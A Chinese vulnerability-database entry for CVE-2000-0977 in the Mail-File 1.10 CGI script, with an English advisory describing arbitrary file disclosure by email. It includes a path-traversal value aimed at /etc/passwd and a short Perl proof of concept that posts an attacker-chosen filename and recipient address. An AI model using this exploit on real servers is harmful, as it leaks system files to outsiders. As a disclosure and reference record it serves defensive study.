MailFile漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106040 漏洞类型 未知
发布时间 2000-10-11 更新时间 2005-10-12
CVE编号 CVE-2000-0977 CNNVD-ID CNNVD-200012-188
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-188
|漏洞详情
MailFile1.10版本中的mailfile.cgiCGI程序存在漏洞。远程攻击者可以通过规定POST请求中的"filename"参数中的目标文件名读取任意文件,然后该漏洞被电子邮件发送到"email"参数指定地址。
|漏洞EXP
source: http://www.securityfocus.com/bid/1807/info

OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of <i>any</i> readable user-specified files to an email address. When used normally, the web interface provides the user with the option to select files to send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the filename (eg "../../../../../../../../../etc/passwd"). The script also checks the value of the referrer when accepting submitted input from the form but fails to protect against this attack. If exploited, an attacker can read arbitrary files on the filesystem with the privileges of the webserver. This may lead to further compromise.

#!/usr/bin/perl

use HTTP::Request::Common;
use LWP::UserAgent;

$ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://domain/mailfile.cgi',
[real_name => 'value1',
email => 'value2',
filename => 'value3',
]);

--snip--

value3 = target filename
value2 = where to send the file to
value1 = username.. can be anything.
|参考资料

来源:BID
名称:1807
链接:http://www.securityfocus.com/bid/1807
来源:BUGTRAQ
名称:20001011MailFilePOSTVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-10/0172.html
来源:XF
名称:mailfile-post-file-read
链接:http://xforce.iss.net/static/5358.php